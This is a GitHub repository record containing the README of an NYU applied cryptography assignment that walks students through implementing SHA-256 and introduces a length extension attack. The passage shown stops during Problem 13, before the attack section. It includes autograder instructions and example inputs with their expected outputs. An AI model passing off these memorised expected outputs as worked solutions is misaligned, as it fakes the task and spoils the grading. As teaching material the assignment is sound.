{"data": [{"name": "oconnor663/sha256_project", "link": "https://github.com/oconnor663/sha256_project", "tags": [], "stars": 516, "description": "developed for NYU Tandon's Applied Cryptography course", "lang": "Python", "repo_lang": "", "readme": "# The SHA-256 Project\n\n> This project was originally assigned in NYU Tandon's CS-GY 6903 Applied\nCryptography course, Fall 2021. Here's the [original course\nrepo](https://github.com/oconnor663/applied_crypto_2021_fall) with all the\nother problem sets.\n\nIn this project we're going to implement SHA-256 ourselves, and then we'll use\nour implementation to demonstrate a \"length extension attack\". To get a sense\nof scale, take a look at the [SHA-256 pseudocode on\nWikipedia](https://en.wikipedia.org/wiki/SHA-2#Pseudocode). That pseudocode\nwill be one of our references, and there will be several direct quotes from it\nbelow. The [animations in this video](https://youtu.be/f9EbD6iY9zI) might also\nhelp you get a big-picture sense of what the algorithm is doing.\n\nImplementing that pseudocode takes less than a hundred lines of Python, which\nmight not seem like a lot. But there are lots of little details in those lines,\nand the nature of the \"avalanche effect\" is such that a tiny mistake will\ntotally mess up your output, usually without giving you any useful feedback\nabout what you did wrong. So we'll move slowly, piece by piece, making sure to\ntest each piece before we move on to the next. Read and reread each problem\ncarefully, *two or three times through,* and then follow the instructions\n*exactly* as you write your code. If the instructions are unclear, ask for help\nand avoid the temptation to guess. Mistakes will be difficult to debug, which\nmakes this project challenging.\n\nSo...what's the point of such a challenging project? If we almost never\nimplement hash functions ourselves in the real world, why are we going to spend\nour precious time on it now? Two reasons:\n\nConcretely, as long as SHA-2 remains widely used, length extension attacks will\nremain a common pitfall. You need to know about them to use SHA-2 safely, and\nto help others use it safely. As with most attacks, the best way to understand\nthe length extension attack is to do it yourself, which means we need to get\nour hands on the inner workings of SHA-2.\n\nMore broadly, there are just so many black boxes in cryptography that we almost\nnever look inside, especially our block ciphers, stream ciphers, and hash\nfunctions. No one has enough time to learn the details of all of them, not even\nprofessional cryptographers. But these algorithms are not magic, and this class\nwould be doing you a disservice if we never opened up any black boxes. Our goal\nisn't to memorize all the details, but to build up the sort of practical\nintuition that can only come from having seen the details before. And I want\nyou to come away from this class with the confidence that you can handle this\nlevel of detail for any algorithm, if and when you need to.\n\nSo this is it. This is where we're going to open one of the black boxes and get\nall the way to the bottom of it. This is SHA-256.\n\n## Contents\n\n* [Workflow](#workflow)\n* [Example input](#example-input)\n* [Example output](#example-output)\n* [Building blocks](#building-blocks)\n * [Problem 1: addition modulo 232](#problem-1-addition-modulo-232)\n * [Problem 2: bitwise right rotation](#problem-2-bitwise-right-rotation)\n* [The Message Schedule](#the-message-schedule)\n * [Problem 3: `little_sigma0()`](#problem-3-little_sigma0)\n * [Problem 4: `little_sigma1()`](#problem-4-little_sigma1)\n * [Problem 5: the message schedule](#problem-5-the-message-schedule)\n* [The Round Function](#the-round-function)\n * [Problem 6: `big_sigma0()`](#problem-6-big_sigma0)\n * [Problem 7: `big_sigma1()`](#problem-7-big_sigma1)\n * [Problem 8: `choice()`](#problem-8-choice)\n * [Problem 9: `majority()`](#problem-9-majority)\n * [Problem 10: the round function](#problem-10-the-round-function)\n* [The Compression Function](#the-compression-function)\n * [Problem 11: the compression function](#problem-11-the-compression-function)\n* [Padding](#padding)\n * [Problem 12: padding](#problem-12-padding)\n* [The Hash Function](#the-hash-function)\n * [Problem 13: the hash function](#problem-13-the-hash-function)\n* [The Length Extension Attack](#the-length-extension-attack)\n * [Problem 14: modeling the extended input](#problem-14-modeling-the-extended-input)\n * [Problem 15: recovering the state](#problem-15-recovering-the-state)\n * [Problem 16: the length extension attack](#problem-16-the-length-extension-attack)\n* [Conclusion](#conclusion)\n\n## Workflow\n\nThis project was originally assigned in NYU Tandon's CS-GY 6903 Applied\nCryptography course. It's intended to be JSON-in-JSON-out and autograded. A\nsimplified [`grade.py`](grade.py) script is provided in this repo, but if you\nprefer you can also just visually compare the output of your solution to the\nexample output provided. The original class was taught in Python, and some of\nthe problems below include example Python code, but feel free to code in\nwhatever language you like. Example solutions are provided in both\n[Python](solution_py) and [Rust](solution_rs).\n\nHere's a bare minimum example of parsing JSON input and producing JSON output\nusing Python:\n\n```python\nimport json\nimport sys\n\ninputs = json.load(sys.stdin)\noutputs = {}\n\noutputs[\"problem1\"] = [\"your\", \"answer\", \"here\"]\n\njson.dump(outputs, sys.stdout)\n```\n\nTo run that directly with [`example_input.json`](example_input.json), you'd\nsave it to a file like `my_solution.py` and then run this in the terminal:\n\n```\n$ python3 my_solution.py < example_input.json\n{\"problem1\": [\"your\", \"answer\", \"here\"]}\n```\n\nTo grade it, you'd run this in the terminal:\n\n```\n$ ./grade.py python3 my_solution.py\nproblem1 incorrect\nrandomized input:\n [[1, 2], [4294967295, 1], [3148047433, 2995627551]]\nexpected output:\n [3, 0, 1848707688]\nyour output:\n ['your', 'answer', 'here']\nproblem2 missing\nproblem3 missing\nproblem4 missing\nproblem5 missing\nproblem6 missing\nproblem7 missing\nproblem8 missing\nproblem9 missing\nproblem10 missing\nproblem11 missing\nproblem12 missing\nproblem13 missing\nproblem14 missing\nproblem15 missing\nproblem16 missing\n```\n\nAs you can see there, the grading script generates random inputs every time you\nrun it. So a complete solution should read input values from the JSON input\nevery time, rather than just hardcoding the example inputs.\n\nHere's a common pitfall for folks who haven't worked with JSON and stdin/stdout\nbefore: If you print anything extra to stdout (like with the regular Python\n`print()` function) that will mess up your JSON output, and the grading script\nwill give you an error message like \"Your solution isn't valid JSON.\" If you\nsee that error, make sure to comment out your print statements.\n\n## Example input\n\n```json\n{\n \"problem1\": [\n [1, 2],\n [4294967295, 1],\n [3050487260, 3710144918]\n ],\n \"problem2\": [\n [2, 1],\n [1, 1],\n [2919882184, 31]\n ],\n \"problem3\": 1114723206,\n \"problem4\": 1232674167,\n \"problem5\": \"iguana wombat dog kangaroo llama turkey yak unicorn sheep xenoce\",\n \"problem6\": 3536071395,\n \"problem7\": 651015076,\n \"problem8\": [2749825547, 776049372, 1213590135],\n \"problem9\": [3758166654, 2821345890, 1850678816],\n \"problem10\": {\n \"state\": [\n 2739944672, 3126690193, 4191866847, 1163785745,\n 3714074692, 1172792371, 283469062, 826169706\n ],\n \"round_constant\": 961987163,\n \"schedule_word\": 3221900128\n },\n \"problem11\": {\n \"state\": [\n 2918946378, 1679978889, 1678006433, 650957219,\n 379281712, 2112907926, 1775216060, 2152648190\n ],\n \"block\": \"manatee fox unicorn octopus dog fox fox llama vulture jaguar xen\"\n },\n \"problem12\": [0, 1, 55, 56, 64, 492022654431536432],\n \"problem13\": [\n \"\",\n \"hello world\",\n \"aardvark zebra yak pig jaguar aardvark rhinoceros butte\",\n \"narwhal dog llama llama giraffe narwhal octopus dog xeno\",\n \"John Jacob Jingleheimer Schmidt! His name is my name too. Whenever we go out the people always shout there goes John Jacob Jingleheimer Schmidt! Nanananananana...\"\n ],\n \"problem14\": {\n \"original_input\": \"fox elephant dog\",\n \"chosen_suffix\": \"pig jaguar iguana\"\n },\n \"problem15\": \"bacb15aef84802baa0f530845013a98ee1eede664b914f8ebc2a520e69049a09\",\n \"problem16\": {\n \"original_hash\": \"27b82abe296f3ecd5174b6e6168ea683cd8ef94306d9abd9f81807f2fa587d2a\",\n \"original_len\": 41,\n \"chosen_suffix\": \"manatee jaguar zebra zebra dog\"\n }\n}\n```\n\n## Example output\n\n```json\n{\n \"problem1\": [3, 0, 2465664882],\n \"problem2\": [1, 2147483648, 1544797073],\n \"problem3\": 1345017931,\n \"problem4\": 2902922196,\n \"problem5\": [\n 1768387937, 1851859063, 1869439585, 1948279919, 1730177889, 1852268914, 1869553772, 1818324321,\n 544503154, 1801812256, 2036427552, 1970170211, 1869770272, 1936221541, 1881176165, 1852793701,\n 3002878561, 3711121932, 1520676164, 3002441970, 2935068969, 1610329529, 1904580351, 3219988740,\n 2337695268, 263015313, 2120931855, 131203777, 3818546915, 19163115, 3479924161, 2154860703,\n 1790169326, 516580487, 2414737634, 909025701, 2241053595, 1237268359, 3797503938, 1773623028,\n 2840671725, 2299292186, 1933596460, 2279513616, 514132674, 3245155609, 1753922983, 2241450350,\n 2449659630, 262239956, 773552098, 3253131632, 3863807927, 879696536, 3143654396, 3973063648,\n 509015903, 270850193, 1893431553, 719566283, 2310657204, 365781698, 3761063438, 1007484868\n ],\n \"problem6\": 3003388882,\n \"problem7\": 2194029931,\n \"problem8\": 1783753340,\n \"problem9\": 3893039714,\n \"problem10\": [\n 1724514418, 2739944672, 3126690193, 4191866847,\n 1638715774, 3714074692, 1172792371, 283469062\n ],\n \"problem11\": [\n 1251501988, 1663226031, 2877128394, 4050467288,\n 2375501075, 1434687977, 2625842981, 650253644\n ],\n \"problem12\": [\n \"80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\",\n \"800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008\",\n \"8000000000000001b8\",\n \"8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c0\",\n \"80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200\",\n \"800000000000000036a01ffa96b12980\"\n ],\n \"problem13\": [\n \"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\n \"b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9\",\n \"4b45e1bec21185865d1628a8a502eed789193a3c253a529983e4bc17fa65f32b\",\n \"99069f1eba4c874aba649c17136a253e1dd504cda936ab77cf189c2cf9eb88ff\",\n \"68b74d91364475247c10bfee2621eaa13bcabb033ed1dee58b74c05e7944489a\"\n ],\n \"problem14\": \"666f7820656c657068616e7420646f67800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080706967206a616775617220696775616e61\",\n \"problem15\": [\n 3133871534, 4165468858, 2700423300, 1343465870,\n 3790528102, 1267814286, 3156890126, 1761909257\n ],\n \"problem16\": \"50417b93404facb1b481990a7bf6ac963b1e1ee0ccced8b2a5938caa28b52b41\"\n}\n```\n\n## Building blocks\n\nWe'll start with the smallest details at the very bottom of the box. As a first\nstep, we need to build a couple of math operations that Python doesn't give us\ndirectly: modular addition and bitwise right-rotation.\n\n### Problem 1: addition modulo 232\n\nIf you've learned a language like C or Java before, you might know that modular\naddition is what many languages do with integers by default. In these\nlanguages, integers have some fixed size, like 32 bits, and any math operation\nthat would normally give a result \u2265232 instead \"overflows\" and\nstarts counting up from 0 again. These fixed-size integer operations are very\nefficient in hardware, so they're common in CPU instruction sets and in\nalgorithms like SHA-256. However, integers in Python have no fixed size, and\nmath operations in Python never overflow. If you want to see this in action,\nask Python for the value of 21,000,000. This property is lovely for\nour intuition as programmers, because it means Python integers work like the\nregular math we're used to. But alas, it's not how addition is done in SHA-256,\nso we'll need to give ourselves a helper function for this.\n\nDefine a function like `add32(x, y)`. (I'll suggest names for your functions\nthroughout this project, but you can name them whatever you like.) It should\nadd its two arguments and then take the result modulo 232, i.e. the\nremainder when the result is divided by 232. Remember that `%` is\nthe \"modulo\" or \"remainder\" operator in Python, and `**` is the exponentiation\noperator.\n\n**Input:** a list of `(x, y)` pairs\n\n**Output:** a list of results from calling `add32` on each pair\n\n### Problem 2: bitwise right rotation\n\nThe other building block we need is bitwise rotation. Most programming\nlanguages including Python provide a very similar operation called bit\n_shifting_, usually written `<<` (left shift) or `>>` (right shift). A bit\nrotation is like bit shift, but instead of \"falling off the end\" of the number,\nthe bits rotate around to the other end. This is nice for cryptographic\nfunctions that need to do a lot of mixing, because it moves bits around without\nlosing any information. For example, consider this 32-bit number:\n\n```\n00000000000000000000000000001111\n```\n\nIf we right-*shift* that number by two places, we get:\n\n```\n00000000000000000000000000000011\n```\n\nBut if we right-*rotate* that number by two places, we get:\n\n```\n11000000000000000000000000000011\n```\n\nPython doesn't have a built-in bit rotation operator, but we can accomplish the\nsame thing by combining the results of two shifts. If you enjoy bit twiddling\npuzzles, figure out how to do this before reading further. If not, it's ok to\njust copy the following function, but make sure you take a few moments to walk\nthrough the example above and see how it does the right thing.\n\n```python\ndef rightrotate32(x, n):\n assert x < 2 ** 32, \"x is too large. Did you use + instead of add32 somewhere?\"\n right_part = x >> n\n left_part = x << (32 - n)\n return add32(left_part, right_part)\n```\n\n**Input:** a list of `(x, n)` pairs\n\n**Output:** a list of results from calling `rightrotate32` on each pair\n\nUsing these helper functions and Python's other built-in operations, we're\ngoing to do a lot of math using 32-bit integers. As a shorthand, we'll refer to\nthese integers as \"words\". A \"word\" is just another way of saying \"an integer\nof the size that we prefer to / are able to work with\". The size of a word\ndepends on context, but **in the context of SHA-256, a \"word\" means a 32-bit\nunsigned integer.**\n\n## The Message Schedule\n\nWith those two building blocks in place, we're ready to implement the first\nmajor moving part of our hash function, the \"message schedule\". Here the\n\"message\" means the hash function's input. In each round of its compression\nfunction, SHA-256 mixes in one word from the message. (Make sure you read the\ndefinition of a \"word\" above.) The \"message schedule\" defines exactly what\nthose words are and the order in which they're used.\n\nA SHA-256 message block is 64 bytes long, and a word is 4 bytes long, so one\nblock contains exactly 16 words. SHA-256 has 64 rounds, and the first 16 of\nthose rounds use those 16 message words directly. The subsequent 48 rounds mix\ndifferent message words together using a formula. We're about to implement that\nformula. First we need a couple more small helpers, which we'll call\n`little_sigma0` and `little_sigma1`.\n\n### Problem 3: `little_sigma0()`\n\nGiven a word `x`, we define `little_sigma0(x)` to be the value:\n\n```python\nrightrotate32(x, 7) ^ rightrotate32(x, 18) ^ (x >> 3)\n```\n\nImplement this function in Python. You can copy the line above if you like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `little_sigma0(x)`\n\nBased on [this paper](https://arxiv.org/pdf/1402.1314.pdf), I'm pretty sure the\nname \"sigma\" (Greek lowercase \u03c3 and uppercase \u03a3) refers to the \"S-boxes\" or\n\"substitution boxes\" that we're familiar with from block ciphers. See p. 57 of\n*Serious Cryptography*.\n\n### Problem 4: `little_sigma1()`\n\nSimilarly, given a word `x`, we define `little_sigma1(x)` to be the value:\n\n```python\nrightrotate32(x, 17) ^ rightrotate32(x, 19) ^ (x >> 10)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `little_sigma1(x)`\n\n### Problem 5: the message schedule\n\nNow we're ready to compute the full 64-**word** message schedule array, which\nis usually called `W` (for \"words\"). As we said above, the block size of\nSHA-256 is 64 **bytes**, so for this process you start off with a 64-byte block\nof input. Convert these 64 bytes into 16 words, by converting each 4-byte group\ninto an integer using a **big-endian** conversion like\n[`int.from_bytes(..., \"big\")`](https://docs.python.org/3/library/stdtypes.html#int.from_bytes).\n(Using the wrong endianness here will be a *common mistake*.) This gives you\nthe first 16 elements of `W`. For each of the remaining 48 elements \u2014 that is,\nfor each index from 16 to 63 \u2014 use the following formula:\n\n```\nW[i] := W[i-16] + little_sigma0(W[i-15]) + W[i-7] + little_sigma1(W[i-2])\n```\n\nNote that in this case the formula is pseudocode, not Python. The `:=` symbol\nmeans \"is defined to be\", similar to `=` in Python. Importantly, the `+` symbol\nin SHA-256 pseudocode does *not* mean Python's `+`, but rather the `add32()`\nfunction that we defined back in Problem 1. (Implementing pseudocode using\nregular Python addition rather than `add32` will be a *common mistake*\nthroughout this project.) Depending on how you structure your Python code, you\nmight also want to use the\n[`.append()`](https://docs.python.org/3/tutorial/datastructures.html) method on\nlists.\n\nDefine a function like `message_schedule(block)` which takes a 64-byte block\nand returns a 64-word list, according to the formula described above. Your\ninput for this problem is an ASCII string of length 64. Convert it to bytes,\nand use your `message_schedule()` function to construct message schedule for\nthat block. Your output should be the resulting list.\n\n**Input:** an ASCII string of length 64, which represents a block of input for the compression function\n\n**Output:** the resulting message schedule, a list of 64 words (integers)\n\nAs you work on this part of the algorithm, it might be helpful or interesting\nto compare notes with how different sources describe it. Here's how *Serious\nCryptography* describes it, on p. 119:\n\n\"message\n\nAnd here's how [the pseudocode on\nWikipedia](https://en.wikipedia.org/wiki/SHA-2#Pseudocode) describes it:\n\n```\ncreate a 64-entry message schedule array w[0..63] of 32-bit words\n(The initial values in w[0..63] don't matter, so many implementations zero them here)\ncopy chunk into first 16 words w[0..15] of the message schedule array\n\nExtend the first 16 words into the remaining 48 words w[16..63] of the message schedule array:\nfor i from 16 to 63\n s0 := (w[i-15] rightrotate 7) xor (w[i-15] rightrotate 18) xor (w[i-15] rightshift 3)\n s1 := (w[i- 2] rightrotate 17) xor (w[i- 2] rightrotate 19) xor (w[i- 2] rightshift 10)\n w[i] := w[i-16] + s0 + w[i-7] + s1\n```\n\nAnd finally, here's how it's described in the official standard that defines\nSHA-256, p. 22 of [FIPS\n180-4](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf):\n\n\"message\n\nThese are all different ways of describing the same message schedule.\n\nOnce you've got the message schedule implemented correctly, you've reached the\nfirst major milestone of the project. Well done! We'll need to set it aside for\na moment to focus on another big moving part, but don't worry: we'll come back\nand make use of it before long.\n\n## The Round Function\n\nAs we said above, the SHA-256 compression function does 64 rounds of mixing.\nWe're about to implement the operation that's done for each round. To get\nstarted, we're going to need four more small helper functions:\n\n### Problem 6: `big_sigma0()`\n\nGiven a word `x`, we define `big_sigma0(x)` to be the value:\n\n```python\nrightrotate32(x, 2) ^ rightrotate32(x, 13) ^ rightrotate32(x, 22)\n```\n\nImplement this function in Python. You can copy the line above if you like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `big_sigma0(x)`\n\n### Problem 7: `big_sigma1()`\n\nGiven a word `x`, we define `big_sigma1(x)` to be the value:\n\n```python\nrightrotate32(x, 6) ^ rightrotate32(x, 11) ^ rightrotate32(x, 25)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\n**Inputs:** an integer `x`\n\n**Outputs:** the value `big_sigma1(x)`\n\n### Problem 8: `choice()`\n\nGiven three words, `x`, `y`, and `z`, we define `choice(x, y, z)` to be the value:\n\n```python\n(x & y) ^ (~x & z)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\nNote that the `~` symbol in Python means \"bitwise-not\", i.e. turn all the\n0-bits into 1's and all the 1-bits into 0's. This isn't an operation we need\nvery often, but it's nice that it's built-in. The fact that Python integers are\nboth signed and also variably-sized means that the behavior of `~` is subtler\nthan it might seem at first glance. Because of the rules of [\"two's complement\"\nsigned arithmetic](https://en.wikipedia.org/wiki/Two%27s_complement), it tends\nto give us negative numbers. Luckily, all the little details work out in the\nend, and we can use `~` here without worrying about it. You can just trust me\non that and copy the line of code above, or you can explore how `~` works\nin Python as an exercise.\n\n**Inputs:** a list of three integers, `[x, y, z]`\n\n**Outputs:** the value `choice(x, y, z)`\n\nBefore you move on from this function, take a moment to stare at it. Can you\ntell why it's called \"choice\"?\n\n### Problem 9: `majority()`\n\nThe last helper for the round function. Given three words, `x`, `y`, and `z`,\nwe define `majority(x, y, z)` to be the value:\n\n```python\n(x & y) ^ (x & z) ^ (y & z)\n```\n\nImplement this function in Python too. Again, you can copy the line above if\nyou like.\n\n**Inputs:** a list of three integers, `[x, y, z]`\n\n**Outputs:** the value `majority(x, y, z)`\n\nSame follow-up question as above: Can you tell why this function is called\n\"majority\"? This one's a little trickier. Three bits put together have\n23 = 8 possible values, and the easiest way to see this one is to\njust make a table and calculate what happens in each case.\n\n### Problem 10: the round function\n\nAlright, we're ready to implement the next big moving part of SHA-256, the\nround function. The round function takes three arguments. The most important of\nthese is the **state**, a list of 8 words. Recall the diagram of the\nMerkle\u2013Damg\u00e5rd construction from p. 112 of *Serious Cryptography*:\n\n\"Merkle\u2013Damg\u00e5rd\n\nThe values H0, H1, and H2 represent this\n8-word state as it's transformed by each call to the compression function. At\nthis point we're working on the round function, which is _inside_ the\ncompression function (i.e. inside the trapezoids in that diagram), but it's the\nsame state that we're talking about.\n\nThe other two inputs to the round function are the **round constant** and the\n**schedule word**, each of which is one word (an integer). As you might guess,\nthe schedule word is ultimately going to come from the message schedule, which\nwe implemented in Problem 5, but for now we'll just take it as an\nargument.\n\nDefine a function like `round(state, round_constant, schedule_word)`. This\nfunction starts by computing several values, using the helper functions defined\nabove:\n\n```\nch := choice(state[4], state[5], state[6])\ntemp1 := state[7] + big_sigma1(state[4]) + ch + round_constant + schedule_word\nmaj := majority(state[0], state[1], state[2])\ntemp2 := big_sigma0(state[0]) + maj\n```\n\nAs in Problem 5, these formulas are pseudocode, and the `+` symbol means\n`add32()`. Finally, the round function assembles a new state:\n\n```\nnew_state := [\n temp1 + temp2,\n state[0],\n state[1],\n state[2],\n state[3] + temp1,\n state[4],\n state[5],\n state[6],\n]\n```\n\nThis `new_state` is the return value of `round()`.\n\nYour input for this problem is an object with three fields, `\"state\"`\ncontaining a list of 8 integers, `\"round_constant\"` containing one integer, and\n`\"schedule_word\"` containing one integer. Call your `round()` function with\nthese three arguments. Your output should be the resulting new state.\n\n**Input:** an object with three fields, `\"state\"`, `\"round_constant\"`, and `\"schedule_word\"`\n\n**Output:** a list of 8 words (integers), the new state returned by `round()`\n\nAs we did in Problem 5, we can compare how different sources describe the\nsame part of the algorithm. *Serious Cryptography* doesn't include the SHA-256\nround function in detail, describing it only as \"more complex than that of\nSHA-1\" on p. 119.\n\n[The pseudocode on Wikipedia](https://en.wikipedia.org/wiki/SHA-2#Pseudocode)\nuses the variables `a`, `b`, `c`, `d`, `e`, `f`, `g`, and `h` to refer to the 8\nelements of the state array. Here's how it describes the round function:\n\n```\nS1 := (e rightrotate 6) xor (e rightrotate 11) xor (e rightrotate 25)\nch := (e and f) xor ((not e) and g)\ntemp1 := h + S1 + ch + k[i] + w[i]\nS0 := (a rightrotate 2) xor (a rightrotate 13) xor (a rightrotate 22)\nmaj := (a and b) xor (a and c) xor (b and c)\ntemp2 := S0 + maj\n\nh := g\ng := f\nf := e\ne := d + temp1\nd := c\nc := b\nb := a\na := temp1 + temp2\n```\n\nP. 23 of the [FIPS\n180-4](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf) standard\ndescribes the round function using uses the same 8 variables:\n\n\"the\n\nOnce you've got the round function working, you've reached the second major\nmilestone of the project. Very well done! Most of the little details are behind\nus now, and the pieces we've built are about to start fitting together.\n\n## The Compression Function\n\n### Problem 11: the compression function\n\nFinally, we've arrived at a piece big enough that we've actually heard of it\nbefore. The compression function is the trapezoid from the Merkle\u2013Damg\u00e5rd\ndiagram above. This is where we're going to write the \"round loop\" that\nexecutes the round function 64 times, once for each of the 64 rounds of\nSHA-256.\n\nWe saw the `round_constant` argument above. We need to start by copying the\narray of values that we'll use for this argument. Paste the following into your\nPython code as a global variable:\n\n```python\nROUND_CONSTANTS = [\n 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,\n 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,\n 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,\n 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,\n 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,\n 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,\n 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,\n 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2,\n]\n```\n\nYou'll see the same array near the top of the [Wikipedia\npseudocode](https://en.wikipedia.org/wiki/SHA-2#Pseudocode). In effect, these\nare just some hardcoded, random-looking numbers that we add to the mix. In\nfact, they do actually come from a formula, something to do with the cube roots\nof the first 64 prime numbers. But the details of the formula don't matter to\nus. These are just [\"nothing-up-my-sleeve\nnumbers\"](https://en.wikipedia.org/wiki/Nothing-up-my-sleeve_number).\n\nNow, define a function like `compress(input_state, block)`, where `input_state`\nis an 8-word list, and `block` is a 64-byte block of the hash function's input.\nThis function combines the message schedule from Problem 5 with the round\nfunction from Problem 10, like this:\n\n```\nW := message_schedule(block)\n\nstate := input_state\nfor i in 0, 1, ..., 63\n state = round(state, ROUND_CONSTANTS[i], W[i])\n\nstate = [\n input_state[0] + state[0],\n input_state[1] + state[1],\n input_state[2] + state[2],\n input_state[3] + state[3],\n input_state[4] + state[4],\n input_state[5] + state[5],\n input_state[6] + state[6],\n input_state[7] + state[7],\n]\n```\n\nAs in Problem 5, these formulas are pseudocode, and the `+` symbol means\n`add32()`. The final value of `state` is the return value of `compress()`. Note\nthat the value of `input_state` gets used again at the end, so `input_state`\nand `state` do need to be two different variables.\n\nYour input for this problem is an object with two fields, `\"state\"` containing\na list of 8 integers and `\"block\"` containing an ASCII string of length 64.\nConvert the block to bytes and then call your `compress()` function with those\narguments. Your output should be the resulting new state.\n\n**Input:** an object with two fields, `\"state\"` and `\"block\"`\n\n**Output:** a list of 8 words (integers), the new state returned by `compress()`\n\nBefore you move on, think about the loop you just wrote. It's probably just two\nor three lines of code. But 64 rounds is actually quite a lot of work for the\ncomputer. This little loop, plus all the code inside of `round()`, is where the\nmagic happens. This is the mixing loop. When cryptographers study SHA-256 and\ntry to develop attacks, this little loop is what they're attacking. That makes\nthe number 64 a very careful tradeoff between speed and security. Is 64 rounds\nenough mixing to guarantee collision resistance and all the other security\nproperties? It seems to be enough today, but what about ten or twenty years\nfrom now? Will SHA-256 be able to withstand another generation of clever\nattacks and faster computers? Maybe some of you will have a hand in that\nresearch...\n\nIn any case, for now we have our secure compression function. With this\nworking, we've turned onto the home stretch. The full hash function is in\nsight.\n\n## Padding\n\n### Problem 12: padding\n\nSHA-256 takes a \"message\" of any length as input, but the compression function\nworks with 64-byte blocks at a time, so we need to pad the message to be an\nexact multiple of the block size. This is very similar to what we did with\nblock ciphers in Chapter 4 and Problem Set 3. As with block\nciphers, a naive padding scheme like \"just fill the remainder of the last block\nwith zeros\" isn't going to work. This time it's because of collision\nresistance: If two different messages looked the same after padding, then their\nhashes would be the same too, which is never supposed to happen. That means we\nneed a proper, unambiguous padding scheme.\n\nIt would be nice if we could reuse our PCKS#7 code from Problem Set 3, but alas\nSHA-256 does something different. On the bright side, because this is hashing\nand not encryption, at least we don't need to write any code for unpadding.\n\nThe SHA-256 padding scheme is originally defined in terms of bits, not bytes. I\nthink it's a little clearer in those terms, so let's start there. Remember that\nthere are 8 bits in a byte, so a block size of 64 bytes is the same as 512\nbits. Here's the padding scheme as it's originally defined:\n\n1. Start the padding bitstring with a single 1-bit.\n2. Then append some 0-bits after that. We'll define how many in step 4 below.\n3. Finally, append the bit-length of the message, encoded as a 64-bit unsigned\n big-endian number with\n [`.to_bytes(8, \"big\")`](https://docs.python.org/3/library/stdtypes.html#int.to_bytes).\n4. Choose the number of 0-bits for step 2 to be the smallest number such that\n the total bit-length of the message plus the padding is an exact multiple of\n 512.\n\nA side note: You might notice that step 3 there isn't actually necessary for\nmaking the padding unambiguous. Steps 1 and 2 are sufficient for that. The goal\nof step 3 is to make it harder to find collisions, by including the message\nlength in the mix.\n\nDefining the padding scheme in terms of bits like this is pretty\nstraightforward, but in practice our programming languages and our computer\nhardware don't usually talk about individual bits directly. We need to\ntranslate that definition into bytes. So here's the exact same padding scheme,\nredescribed in terms of bytes, the way we'll actually implement it:\n\n1. Start the padding bytestring with a single 0x80 byte (decimal 128, binary\n 0b10000000). As you can see in the binary representation, this is a single\n 1-bit followed by seven 0-bits.\n2. Then append some 0x00 bytes after that. We'll define how many in step 4\n below.\n3. Finally, append **8 times** the byte-length of the message, encoded as an\n 8-byte unsigned big-endian number with\n [`.to_bytes(8, \"big\")`](https://docs.python.org/3/library/stdtypes.html#int.to_bytes).\n (Forgetting to multiply the `len()` by 8 here is a *common mistake*.)\n4. Choose the number of 0x00 bytes for step 2 to be the smallest number such\n that the total byte-length of the message plus the padding is an exact\n multiple of 64.\n\nThat translation made things a little less elegant. The first byte is less\nobvious, and the multiply-by-8 step is easy to forget. But we'll manage.\n\nHow do we determine the number of 0x00 bytes in step 4? If you like little\narithmetic puzzles, this is another good one to think about on your own before\nreading further. Otherwise, feel free to copy the following three lines of\nPython:\n\n```python\nremainder_bytes = (message_length + 8) % 64 # number of bytes in the final block, including the appended length\nfiller_bytes = 64 - remainder_bytes # number of bytes we need to add, including the initial 0x80 byte\nzero_bytes = filler_bytes - 1 # number of 0x00 bytes we need to add\n```\n\nTake a minute or two to review that logic and convince yourself it's correct.\nThen write a function like `padding(message_length)`, which takes the original\n**byte-length** of a message and returns the padding **bytestring** for that\nmessage. Your input for this problem is a list of message byte-lengths. For\neach of these, call your `padding()` function with that length as an argument\nand hex-encode the resulting padding bytes. (There are no message bytes to\nconcatenate in this problem, just the padding bytes themselves.) Your output\nfor this problem should be the resulting list of hex-encoded padding strings.\n\nI recommend that you have your `padding()` function return raw bytes, and that\nyou call it like `padding(...).hex()` for this problem. If you prefer to have\nyour `padding()` function do hex-encoding internally, that's ok too, but then\nyou'll need to remember to hex-decode its output in the following problems.\n\n**Input:** a list of message lengths, counted in bytes\n\n**Output:** a list of SHA-256 padding bytestrings, each hex-encoded\n\nThis padding function was our last big moving part. All we have to do now is\nput the padding function and the compression function together.\n\n## The Hash Function\n\n### Problem 13: the hash function\n\nNow we're ready to assemble the complete hash function. The genuine article.\nOnce you finish this problem, you can test your code against Python's 